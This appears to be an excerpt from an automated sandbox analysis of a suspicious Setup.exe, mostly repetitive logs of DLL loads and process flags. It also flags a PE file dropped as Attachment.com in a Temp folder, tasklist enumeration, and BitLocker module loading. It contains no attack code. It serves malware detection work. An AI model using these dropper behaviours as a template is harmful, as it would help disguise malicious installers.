      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: Setup.exeStatic file information: File size 1079797 > 1048576
      Source: Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
      Source: Setup.exeStatic PE information: real checksum: 0x114378 should be: 0x115d19

      Persistence and Installation Behavior

      barindex
      Drops PE files with a suspicious file extension
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\189943\Attachment.comJump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\189943\Attachment.comJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\189943\Attachment.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
